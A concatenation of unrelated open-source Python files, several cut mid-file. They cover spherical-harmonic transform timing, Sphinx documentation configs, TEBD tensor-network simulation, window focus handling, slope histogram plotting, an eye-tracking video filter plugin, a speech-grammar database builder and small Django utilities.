#!/usr/bin/env python """ This script is a python version of TimingAccuracyDHC. We use numpy functions to simplify the creation of random coefficients. """ import os import sys import time import numpy as np sys.path.append(os.path.join(os.path.dirname(__file__), "../../..")) import pyshtools as shtools #==== MAIN FUNCTION ==== def main(): TimingAccuracyDHC() #==== TEST FUNCTIONS ==== def TimingAccuracyDHC(): #---- input parameters ---- maxdeg = 2800 ls = np.arange(maxdeg + 1) sampling = 1 beta = -1.5 #---- create mask to filter out m<=l ---- mask = np.zeros(2 * (maxdeg + 1) * (maxdeg + 1), dtype=np.bool).reshape(2, maxdeg + 1, maxdeg + 1) mask[0, 0, 0] = True for l in ls: mask[:, l, :l + 1] = True mask[1, :, 0] = False #---- create Gaussian powerlaw coefficients ---- print 'creating {:d} random coefficients'.format(2 * (maxdeg + 1) * (maxdeg + 1)) cilm = np.zeros((2, (maxdeg + 1), (maxdeg + 1)), dtype=np.complex) random_numbers = np.random.normal(loc=0., scale=1., size=2 * (maxdeg + 1) * (maxdeg + 1)) cilm.imag = random_numbers.reshape(2, maxdeg + 1, maxdeg + 1) random_numbers = np.random.normal(loc=0., scale=1., size=2 * (maxdeg + 1) * (maxdeg + 1)) cilm.real = random_numbers.reshape(2, maxdeg + 1, maxdeg + 1) cilm[:, 1:, :] *= np.sqrt((ls[1:]**beta) / (2. * ls[1:] + 1.))[None, :, None] #---- time spherical harmonics transform for lmax set to increasing powers of 2 ---- lmax = 2 print 'lmax maxerror rms tinverse tforward' while lmax <= maxdeg: # trim coefficients to lmax cilm_trim = cilm[:, :lmax + 1, :lmax + 1] mask_trim = mask[:, :lmax + 1, :lmax + 1] #synthesis / inverse tstart = time.time() grid = shtools.MakeGridDHC(cilm_trim, sampling=sampling) tend = time.time() tinverse = tend - tstart #analysis / forward tstart = time.time() cilm2_trim = shtools.SHExpandDHC(grid, s
ampling=sampling) tend = time.time() tforward = tend - tstart # compute error err = np.abs(cilm_trim[mask_trim] - cilm2_trim[mask_
trim]) / np.abs(cilm_trim[mask_trim]) maxerr = err.max() rmserr = np.mean(err**2) print '{:4d} {:1.2e} {:1.2e} {:1.1e}s {:1.1e}s'.\ format(lmax, maxerr, rmserr, tinverse, tforward) lmax = lmax * 2 #==== EXECUTE SCRIPT ==== if __name__ == "__main__": main()
ed. # See the License for the specific language governing permissions and # limitations under the License. # # google-cloud-functions documentation build configuration file # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys import os import shlex # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. sys.path.insert(0, os.path.abspath("..")) # For plugins that can not read conf.py. # See also: https://github.com/docascode/sphinx-docfx-yaml/issues/85 sys.path.insert(0, os.path.abspath(".")) __version__ = "" # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. needs_sphinx = "1.5.5" # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ "sphinx.ext.autodoc", "sphinx.ext.autosummary", "sphinx.ext.intersphinx", "sphinx.ext.coverage", "sphinx.ext.doctest", "sphinx.ext.napoleon", "sphinx.ext.todo", "sphinx.ext.viewcode", "recommonmark", ] # autodoc/autosummary flags autoclass_content = "both" autodoc_default_options = {"members": True} autosummary_generate = True # Add any paths that contain templates here, relative to this directory. templates_path = ["_templates"] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # source_suffix = ['.rst', '.md'] source_suffix = [".rst", ".md"] # The encoding of source files. # source_encoding = 'utf-8-sig' # The root toctree document. root_doc = "index" # General information about the project. project = "google-cloud-functions" copyright = "2019, Google" author = "Google APIs" # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The full version, including alpha/beta/rc tags. release = __version__ # The short X.Y version. version = ".".join(release.split(".")[0:2]) # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: # today = '' # Else, today_fmt is used as the format for a strftime call. # today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = [ "_build", "**/.nox/**/*", "samples/AUTHORING_GUIDE.md", "samples/CONTRIBUTING.md", "samples/snippets/README.rst", ] # The reST default role (used for this markup: `text`) to use for all # documents. # default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. # add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). # add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. # show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = "sphinx" # A list of ignored prefixes for module index sorting. # modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. # keep_warnings = False # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = True # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = "alabaster" # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. html_theme_options = { "description": "Google Cloud Client Libraries for google-cloud-functions", "github_user": "googleapis", "github_repo": "python-functions", "github_banner": True, "font_family": "'Roboto', Georgia, sans", "head_font_family": "'Roboto', Georgia, serif", "code_font_family": "'Roboto Mono', 'Consolas', monospace", } # Add any paths that contain custom themes here, relative to this directory. # html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". # html_title = None # A shorter title for the navigation bar. Default is the same as html_title. # html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. # html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. # html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the b
uiltin "default.css". html_static_path = ["_static"] #
Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. # html_extra_path = [] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. # html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. # html_use_smartypants = True # Custom sidebar templates, maps document names to template names. # html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. # html_additional_pages = {} # If false, no module index is generated. # html_domain_indices = True # If false, no index is generated. # html_use_index = True # If true, the index is split into individual pages for each letter. # html_split_index = False # If true, links to the reST sources are added to the pages. # html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. # html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. # html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. # html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). # html_file_suffix = None # Language to be used for generating the HTML full-text search index. # Sphinx supports the following languages: # 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja' # 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr' # html_search_language = 'en' # A dictionary with options for the search language support, empty by default. # Now only 'ja' uses this config value # html_search_options = {'type': 'default'} # The name of a javascript file (relative to the configuration directory) that # implements a search results scorer. If empty, the default will be used. # html_search_scorer = 'scorer.js' # Output file base name for HTML help builder. htmlhelp_basename = "google-cloud-functions-doc" # -- Options for warnings ------------------------------------------------------ suppress_warnings = [ # Temporarily suppress this to avoid "more than one
lf.H2s[None]) if term is None: raise ValueError(f"No term has been set for sites {sites}, either " "specifically or via a default term.") # add single site term to left site if present H1 = self.H1s.get(i, self.H1s[None]) # but only if this site has a term set if H1 is not None: I_2 = qu.eye(H1.shape[0], dtype=H1.dtype) term = term + qu.kron(H1, I_2) # if not PBC, for the last interaction, add to right site as well if sites and (j == self.n - 1) and (not self.cyclic): H1 = self.H1s.get(j, self.H1s[None]) # but again, only if that site has a term set if H1 is not None: I_2 = qu.eye(H1.shape[0], dtype=H1.dtype) term = term + qu.kron(I_2, H1) return term def __call__(self, sites=None): """Get the cached term for sites ``sites``, generate if necessary. """ try: return self._terms[sites] except KeyError: term = self.gen_term(sites) self._terms[sites] = term return term def mean_norm(self, ntype='fro'): """Computes the average frobenius norm of local terms. Also generates all terms if not already cached. """ if self.n is None: return qu.norm(self(), ntype) nterms = self.n - int(not self.cyclic) return sum( qu.norm(self((i, i + 1)), ntype) for i in range(nterms) ) / nterms def __repr__(self): return f"<NNI(n={self.n}, cyclic={self.cyclic})>" class TEBD: """Class implementing Time Evolving Block Decimation (TEBD) [1]. [1] Guifré Vidal, Efficient Classical Simulation of Slightly Entangled Quantum Computations, PRL 91, 147902 (2003) Parameters ---------- p0 : MatrixProductState Initial state. H : NNI or array_like Dense hamiltonian representing the two body interaction. Should have shape ``(d * d, d * d)``, where ``d`` is the physical dimension of ``p0``. dt : float, optional Default time step, cannot be set as well as ``tol``. tol : float, optional Default target error for each evolution, cannot be set as well as ``dt``, which will instead be calculated from the trotter orderm length of time, and hamiltonian norm. t0 : float, optional Initial time. Defaults to 0.0. split_opts : dict, optional Compression options applied for splitting after gate application, see :func:`~quimb.tensor.tensor_core.tensor_split`. See Also -------- quimb.Evolution """ def __init__(self, p0, H, dt=None, tol=None, t0=0.0, split_opts=None, progbar=True): # prepare initial state self._pt = p0.copy() self._pt.canonize(0) self.N = self._pt.nsites # handle hamiltonian -> convert array to NNI if isinstance(H, np.ndarray): H = NNI(H, cyclic=p0.cyclic) if not isinstance(H, NNI): raise TypeError("``H`` should be a ``NNI`` or 2-site array, " "not a TensorNetwork of any form.") if p0.cyclic != H.cyclic: raise ValueError("Both ``p0`` and ``H`` should have matching OBC " "or PBC.") self.H = H self.cyclic = H.cyclic self._ham_norm = H.mean_norm() self._U_ints = {} self._err = 0.0 # set time and tolerance defaults self.t0 = self.t = t0 if dt and tol: raise ValueError("Can't set default for both ``dt`` and ``tol``.") self.dt = self._dt = dt self.tol = tol # misc other options self.progbar = progbar self.split_opts = {} if split_opts is None else dict(split_opts) @property def pt(self): """The MPS state of the system at the current time. """ return self._pt.copy() @property def err(self): return self._err def choose_time_step(self, tol, T, order): """Trotter error is ``~ (T / dt) * dt^(order + 1)``. Invert to find desired time step, and scale by norm of interaction term. """ return (tol / (T * self._ham_norm)) ** (1 / order) def get_gate(self, dt_frac, sites=None): """Get the unitary (exponentiated) gate for fraction of timestep ``dt_frac`` and sites ``sites``, cached. """ if sites not in self.H.special_sites: sites = None try: return self._U_ints[dt_frac, sites] except KeyError: U = qu.expm(-1.0j * self._dt * dt_frac * self.H(sites)) self._U_ints[dt_frac, sites] = U return U def sweep(self, direction, dt_frac, dt=None, queue=False): """Perform a single sweep of gates and compression. This shifts the orthonognality centre along with the gates as they are applied and split. Parameters ---------- direction : {'right', 'left'} Which direction to sweep. Right is even bonds, left is odd. dt_frac : float What fraction of dt substep to take. dt : float, optional Overide the current ``dt`` with a custom value. """ # if custom dt set, scale the dt fraction if dt is not None: dt_frac *= (dt / self._dt) # ------ automatically combine consecutive sweeps of same time ------ # if not hasattr(self, '_queued_sweep'): self._queued_sweep = None if queue: # check for queued sweep if self._queued_sweep: # if matches, combine and continue if direction == self._queued_sweep[0]: self._queued_sweep[1] += dt_frac return # else perform the old, queue the new else: new_queued_sweep = [direction, dt_frac] direction, dt_frac = self._queued_sweep self._queued_sweep = new_queued_sweep # just queue the new sweep else: self._queued_sweep = [direction, dt_frac] return # check if need to drain the queue first elif self._queued_sweep: queued_direction, queued_dt_frac = self._queued_sweep self._queued_sweep = None self.sweep(queued_direction, queued_dt_frac, queue=False) # ------------------------------------------------------------------- # if direction == 'right': # Apply even gates: # # o-<-<-<-<-<-<-<-<-<- -<-< # | | | | | | | | | | | | >~>~>~>~>~>~>~>~>~>~>~o # UUU UUU UUU UUU UUU ... UUU --> | | | | | | | | | | | | # | | | | | | | | | | | | # 1 2 3 4 5 ==> # for i in range(0, self.N - 1, 2): sites = (i, i +
1) U = self.get_gate(dt_frac, sites) self._pt.left_canonize(start=max(0, i - 1), stop=i) self._pt.gate
_split_( U, where=sites, absorb='right', **self.split_opts) elif direction == 'left': # Apply odd gates: # # >->->- ->->->->->->->->-o # | | | | | | | | | | | | o~<~<~<~<~<~<~<~<~<~<~< # | UUU ... UUU UUU UUU UUU | --> | | | | | | | | | | | | # | | | | | | | | | | | | # <== 4 3 2 1 # for i in reversed(range(1, self.N - (0 if self.cyclic else 1), 2)): sites = (i, i + 1) U = self.get_gate(dt_frac, sites) self._pt.right_canonize( start=min(self.N - 1, i + 2), stop=i + 1) self._pt.gate_split_( U, where=sites, absorb='left', **self.split_opts) # one extra canonicalization
import sys if sys.platform.startswith('win32'): import win32gui GetForegroundWindow = win32gui.GetForegroundWindow SetForegroundWindow = win32gui.SetForegroundWindow elif sys.platform.startswith('darwin'): from Foundation import NSAppleScript def GetForegroundWindow(): return NSAppleScript.alloc().initWithSource_(""" tell application "System Events" return unix id of first process whose frontmost = true end tell""").executeAndReturnError_(None)[0].int32Value() def SetForegroundWind
ow(pid): NSAppleScript.alloc().initWithSource_(""" tell application "System Events" set the frontmost of first process whose unix id is %d to true end tell""" % pid).executeAndReturnError_(None) elif sys.platform.startswith('linux'): from subprocess import call, check_output, CalledProcessError def GetForegroundWindow(): try: output = check_output(['xprop', '-root', '_NET_ACTIVE_WINDOW']) return int(output.split()[-1], 16) except CalledProces
sError: return None def SetForegroundWindow(w): """Returns focus to previous application.""" try: call(['wmctrl', '-i', '-a', str(w)]) except CalledProcessError: pass
#!/usr/bin/env python #/****************************************************************************** # * $Id$ # * # * Project: GDAL Make Histogram and Cumulative graph from Tab delimited tab as # generated by gdal_hist.py # * Purpose: Take a gdal_hist.py output and create a histogram plot using matplotlib # * Author: Trent Hare, thare@usgs.gov # * # ****************************************************************************** # * Public domain licenes (unlicense) # * # * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # * DEALINGS IN THE SOFTWARE. # ****************************************************************************/ import sys import os import math import numpy as np import pandas as pd from pandas.tools.plotting import table import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt def usage(): print 'Usage: slope_histogram_cumulative_graph.py -name "InSight E1" slope_histogram_table.tab outfile.png' prin
t " This program is geared to run on a table as generated by gdal_hist.py" print 'slope_histogram_cumulativ
e_graph.py -name "E_Marg_CE 01" DEM_1m_E_Marg_CE_adir_1m_hist.xls DEM_1m_E_Marg_CE_adir_1m_hist.png' sys.exit(0) #set None for commandline options name = "" infile = None outfile = None # ============================================================================= # Parse command line arguments. # ============================================================================= i = 1 while i < len(sys.argv): arg = sys.argv[i] if arg == '-name': i = i + 1 name = sys.argv[i] elif infile is None: infile = arg elif outfile is None: outfile = arg else: Usage() i = i + 1 if infile is None: usage() if not(os.path.isfile(infile)): input = sys.argv[1] print "filename %s does not exist." % (infile) sys.exit(1) #load table df = pd.DataFrame.from_csv(infile, sep='\t', header=1) #initialize figure fig, ax1 = plt.subplots() #calculate unscaled values #df.value = (df.value * 5) - 0.2 #df.ix[df.value < 0] = 0; df #not to reverse histogram before calculating 'approx' stats #min = round(df.value.min(),2) #max = round(df.value.max(),2) #mean = round(df.value.mean(),2) #stddev = round(df.value.std(),2) #rms = round(math.sqrt((mean * mean) + (stddev * stddev)),2) #statsDict = {'Min':min,'Max':max,'Mean':mean \ #,'StdDev':stddev,'RMS':rms} #statsSeries = pd.Series(statsDict,name='stats') #statsSeries.sort() #t = table(ax1, statsSeries, \ #loc='lower right', colWidths=[0.1] * 2) #t.set_fontsize(18) #props = t.properties() #cells = props['child_artists'] #for c in cells: #c.set_height(0.05) #Plot frequency histogram from input table ax1.fill(df.value,df['count'],'gray') #df.plot(ax1=ax1, kind='area', color='gray', legend=True) ax1.ticklabel_format(style='sci', axis='y', scilimits=(0,0)) ax1.get_yaxis().set_tick_params(direction='out') #get min and max as found by pandas for plotting 'arrow' at X=15 #minY = round(df['count'].min(),0) #maxY = round(df['count'].max(),0) #grab existing ax1 axes #ax = plt.axes() #ax.arrow(15, minY, 0, maxY, head_width=0, head_length=0, fc='k', ec='k') ax1.axvline(x=15, color='black', alpha=0.5) #add cumulative plot on 'Y2' axis using save X axes ax2 = ax1.twinx() ax2.plot(df.value,df['cumulative'],'blue') #df.plot(ax2=ax2, df.value,df['cumulative'],'blue') ax2.get_yaxis().set_tick_params(direction='out') #define labels ax1.set_xlabel('Slope (degrees)') ax1.set_ylabel('Count') ax2.set_ylabel('Cumulative') plt.suptitle(name + ' Slope Histogram and Cumulative Plot') #save out PNG plt.savefig(outfile) print "Graph exported to %s" % (outfile)
# -*- coding: utf-8 -*- ''' Pupil Player Third Party Plugins by cpicanco Copyright (C) 2016 Rafael Picanço. The present file is distributed under the terms of the GNU General Public License (GPL v3.0). You should have received a copy of the GNU General Public License along
with this program. If not, see <http://www.gnu.org/licenses/>. ''' import cv2 from pyglui import ui from plugin import Plugin blue, green, red = 0, 1, 2 class Filter_Opencv_Threshold(Plugin): """ Apply cv2.threshold in each channel of the (world) frame.img """ uniqueness = "not_unique" def __init__(self, g_pool, threshold=177, thresh_mode="BINARY", otsu=False): super(Filter_Opencv_Threshold, self).__init__(g_pool) # ru
n before all plugins # self.order = .1 # run after all plugins self.order = .99 # initialize empty menu self.menu = None # filter properties self.threshold = threshold self.thresh_mode = thresh_mode self.otsu = otsu def update(self,frame,events): # thresh_mode if self.thresh_mode == "NONE": return if self.thresh_mode == "BINARY": cv2_thresh_mode = cv2.THRESH_BINARY if self.thresh_mode == "BINARY_INV": cv2_thresh_mode = cv2.THRESH_BINARY_INV if self.thresh_mode == "TRUNC": cv2_thresh_mode = cv2.THRESH_TRUNC if self.thresh_mode == "TOZERO": cv2_thresh_mode = cv2.THRESH_TOZERO if self.otsu: cv2_thresh_mode = cv2_thresh_mode + cv2.THRESH_OTSU # apply the threshold to each channel for i, channel in enumerate((frame.img[:,:,blue], frame.img[:,:,green], frame.img[:,:,red])): retval, edg = cv2.threshold(channel, self.threshold, 255, cv2_thresh_mode) frame.img[:,:,i] = edg def init_gui(self): # initialize the menu self.menu = ui.Scrolling_Menu('Threshold') # add menu to the window self.g_pool.gui.append(self.menu) # append elements to the menu self.menu.append(ui.Button('remove',self.unset_alive)) self.menu.append(ui.Info_Text('Filter Properties')) self.menu.append(ui.Selector('thresh_mode',self,label='Thresh Mode',selection=["NONE","BINARY","BINARY_INV", "TRUNC","TOZERO"] )) self.menu.append(ui.Switch('otsu',self,label='Otsu')) self.menu.append(ui.Slider('threshold',self,min=0,step=1,max=255,label='Threshold')) def deinit_gui(self): if self.menu: self.g_pool.gui.remove(self.menu) self.menu = None def unset_alive(self): self.alive = False def get_init_dict(self): # persistent properties throughout sessions return {'threshold':self.threshold, 'thresh_mode':self.thresh_mode, 'otsu':self.otsu} def cleanup(self): """ called when the plugin gets terminated. This happens either voluntarily or forced. if you have a GUI or glfw window destroy it here. """ self.deinit_gui()
import antlr3; import sqlite3; import pickle; import sys, os; import re; from SpeakPython.SpeakPython import SpeakPython; from SpeakPython.SpeakPythonLexer import SpeakPythonLexer; from SpeakPython.SpeakPythonParser import SpeakPythonParser; #sort results based on length of labels def sortResults(results): l = len(results); if l == 1 or l == 0: return results; s1 = sortResults(results[:l/2]); s2 = sortResults(results[l/2:]); res = []; si1 = 0; si2 = 0; sl1 = len(s1); sl2 = len(s2); max = sl1 + sl2; for i in range(0, max): if si1 == sl1: res.extend(s2[si2:]); break; if si2 == sl2: res.extend(s1[si1:]); break; if len(s1[si1].labels) > len(s2[si2].labels): res.append( s1[si1] ); si1 += 1; else: res.append( s2[si2] ); si2 += 1; return res; def makeDB(conn): c = conn.cursor(); try: c.execute("DROP TABLE matches"); c.execute("DROP TABLE functions"); c.execute("DROP TABLE kleene") conn.commit(); except Exception as e: conn.rollback(); c.execute("CREATE TABLE matches (order_id INTEGER PRIMARY KEY, keywords TEXT, regex TEXT, results BLOB)"); c.execute("CREATE TABLE functions (name TEXT, regex TEXT, results BLOB)"); c.execute("CREATE TABLE kleene (id TEXT PRIMARY KEY, regexes BLOB)"); #index the keywords to speed up text search c.execute("CREATE INDEX IF NOT EXISTS keyword_idx ON matches (keywords)"); c.execute("CREATE INDEX IF NOT EXISTS func_name_idx ON functions (name)"); conn.commit(); def performTestCases(exp, testCases): print "Testing: ", exp for t in testCases: m = re.match(exp, t); if m == None: print "Test case failed: ", t; return False; return True; def insertIntoDB(conn, matches, functions): matchEntries = []; kleeneEntries = []; funcEntries = []; print "Running test cases for matches..."; idCount = 0; for m in matches: #perform in-suite test cases succeededTests = performTestCases(m.exp, m.testCases); if not succeededTests: return; k = ','.join(m.keywords); m.results = sortResults(m.results); if len(m.kGroupRegexes) > 0: kleeneEntries.append((str(idCount), pickle.dumps(m.kGroupRegexes))); matchEntries.append((idCount, k, m.exp, pickle.dumps(m.results))); idCount += 1; print "All mat
ch test cases passed."; c = conn.cursor(); c.executemany("INSERT INTO matches VALUES (?,?,?,?)", matchEntries)
; conn.commit(); print "Running test cases for functions..."; for f in functions: f = functions[f]; #perform in-suite test cases succeededTests = performTestCases(f, f.testCases); if not succeededTests: return; #save all regex groups in database under function name if len(f.kGroupRegexes) > 0: kleeneEntries.append((f.getName(), pickle.dumps(f.kGroupRegexes))); f.results = sortResults(f.results); funcEntries.append((f.getName(), f.getExp(), pickle.dumps(f.getResults()))); print "All function test cases passed"; c.executemany("INSERT INTO functions VALUES (?,?,?)", funcEntries); c.executemany("INSERT INTO kleene VALUES (?,?)", kleeneEntries); conn.commit(); print "Functions:"; for row in c.execute("SELECT * FROM functions"): print row, '\n'; print "\n"; print "Matches:"; for row in c.execute("SELECT * FROM matches"): print row, '\n'; print "\n"; print "Kleene:"; for row in c.execute("SELECT * FROM kleene"): print row, '\n'; print "\n"; conn.close(); def parse(conn, fileList, dirName): parser = None; otherGlobalTests = {}; for f in fileList: #join filename with current directory path fileName = os.path.join(dirName, f); #if f is a file, parse and insert into db if os.path.isfile(fileName): char_stream = antlr3.ANTLRFileStream(fileName); lexer = SpeakPythonLexer(char_stream); tokens = antlr3.CommonTokenStream(lexer); # for t in lexer: # print t; parser = SpeakPythonParser(tokens); parser.prog(); insertIntoDB(conn, parser.matches, parser.aliases); #if f is a dir, pass list of files into recursive call if os.path.isdir(fileName): subFiles = os.listdir(fileName); otherGlobalTests = parse(conn, subFiles, fileName); globalTests = {}; if parser == None: print "Parser not defined." else: globalTests = parser.globalTests; globalTests.update(otherGlobalTests); return globalTests; def main(argv): name = argv[1] + '.db'; conn = sqlite3.connect(name); makeDB(conn); globalTests = parse(conn, [argv[2]], ''); for gt in globalTests: sp = SpeakPython(name); r = sp.matchResult(gt); resultStr = ''; if r != None: resultStr = r.getResult(); if resultStr != globalTests[gt]: print "Value test case failed: (" + gt + ") does not return (" + globalTests[gt] + "), but instead returns (" + resultStr + ")"; main(sys.argv);
from distutils.core import setup version = '1.1.1' setup(name='CacheGenerator', version=version, des
cription="CacheGenerator for Django", author="Ricardo Santos", author_email="ricardo@getgears.com",
url="http://github.com/ricardovice/CacheGenerator/", packages = ['cachegenerator'] )
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import paddle import paddle.distributed.fleet as fleet import numpy as np import paddle.nn as nn from paddle.distributed.passes import new_pass, PassManager import unittest from dist_pass_test_base import DistPassTestBase class BatchNormAddActNet(nn.Layer): def __init__(self): super(BatchNormAddActNet, self).__init__() self.conv1 = nn.Conv2D(3, 8, (3, 3), data_format="NHWC") self.conv2 = nn.Conv2D(3, 8, (3, 3), data_format="NHWC") self.bn1 = nn.BatchNorm2D(8, data_format="NHWC") self.bn2 = nn.BatchNorm2D(8, data_format="NHWC") self.relu = nn.ReLU() def forward(self, x): y = self.conv1(x) y = self.bn1(y) out = self.conv2(x) out = self.bn2(out) + y out = self.relu(out) out = paddle.flatten(out, 1) return out class TestFuseBatchNormAddActPass(DistPassTestBase): def init(self): self.atol = 1e-4 self.rtol = 1e-4 def get_model(self, place, batch_size=32, image_shape=[224, 224, 3]): image = paddle.static.data( shape=[batch_size] + image_shape, dtype='float32', name='image') model = BatchNormAddActNet() pred_out = model(image) loss = paddle.mean(pred_out) optimizer = paddle.optimizer.Adam(learning_rate=1e-3) dist_strategy = fleet.DistributedStrategy() dist_strategy.fuse_all_reduce_ops = False dist_strategy.without_graph_optimization = True dist_strategy.amp = True dist_strategy.amp_configs = { "init_loss_scaling": 32768, "use_dynamic_loss_scaling": True, } fleet.init(is_collective=True, strategy=dist_strategy) optimizer = fleet.distributed_optimizer(optimizer) optimizer.minimize(loss) rank = paddle.distributed.get_rank() def reader(): seed = int(os.environ.get("SEED", 0)) np.random.seed(seed + rank) for _ in range(10): image_np = np.random.random(size=image.shape).astype('float32') yield image_np, main_program = paddle.static.default_main_program() startup_program = paddle.static.default_startup_program() return main_program, startup_program, [image], [loss], reader def apply_passes(self, main_prog, startup_prog): pass_manager = PassManager([new_pass("f
use_bn_add_act")]) pass_manager.apply([main_prog], [startup_prog]) print(pass_manager.names) op_type = [] for op in main_prog.global_block().ops: op_type.append(op.type) self.assertTrue("fused_bn_add_activation" in op_type) self.assertTrue("fused_bn_add_activation_grad" in op_type) def test_fuse_bn_add_act(self): self.check_main() if __name__ == "__main__": unittest.m
ain()
from django.conf.urls import patterns, include, url from django.conf import settings # Here, user contacts.profile will cause some 'mismatch' since contacts is also a module from profile import ProfileView from contacts import ContactsView from authen import Authenticate strid = settings.CONTACT_URL['strid'] user = settings.CONTACT_URL['user'] contact = settings.CONTACT_URL['contact'] auth = settings.CONTACT_U
RL['auth'] urlpatterns = patterns('', url(r'^api/'+auth+'$', Authenticate.as_view()), url(r'^api/(?P<'+strid+r'>\w{16})/$', ProfileView.as_view())
, url(r'^api/(?P<'+strid+r'>\w{16})/(?P<'+contact+r'>\d+)/$', ContactsView.as_view()), url(r'^(?P<'+user+r'>\w{5,18})/(?P<'+strid+r'>\w{16})/$', ProfileView.as_view()), url(r'^(?P<'+user+r'>\w{5,18})/(?P<'+strid+r'>\w{16})/(?P<'+contact+r'>\d+)/$', ContactsView.as_view()), )
import sys from django.core.management.base import BaseCommand, CommandError import nflgame from terminaltables import AsciiTable from ...models import Player, Team, Season, Week, WeeklyStats class Command(BaseCommand): help = 'takes option position, displays top play
ers as table' def add_arguments(self, parser): # Named (optional) arguments parser.add_argument('position', nargs=1) def handle(self, *args, **
options): p = options['position'] if p: Player.show_top_players(position=p[0]) else: Player.show_top_players()
ftware # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. # # Keystone documentation build configuration file, created by # sphinx-quickstart on Tue May 18 13:50:15 2010. # # This file is execfile()'d with the current directory set to it's containing # dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import os impo
rt sys # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. BASE_DIR = os.path.dirname(os.path.abspath(__file__)) ROOT_DIR = os.path.abspath(os.path.join(BASE_DIR, "..", "..")) sys.path.insert(0, ROOT_DIR) # -- Gene
ral configuration --------------------------------------------------- # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.coverage', 'sphinx.ext.ifconfig', 'sphinx.ext.graphviz', 'sphinx.ext.todo', 'oslo_config.sphinxext', 'oslo_config.sphinxconfiggen', 'oslo_policy.sphinxext', 'oslo_policy.sphinxpolicygen', 'openstackdocstheme',] todo_include_todos = True # Add any paths that contain templates here, relative to this directory. templates_path = [] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8' # The master doctree document. master_doc = 'index' # General information about the project. project = u'Neutron VPNaaS' copyright = u'2011-present, OpenStack Foundation.' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. #language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of documents that shouldn't be included in the build. # unused_docs = [] # List of directories, relative to source directory, that shouldn't be searched # for source files. exclude_trees = [] # The reST default role (for this markup: `text`) to use for all documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. show_authors = True # The name 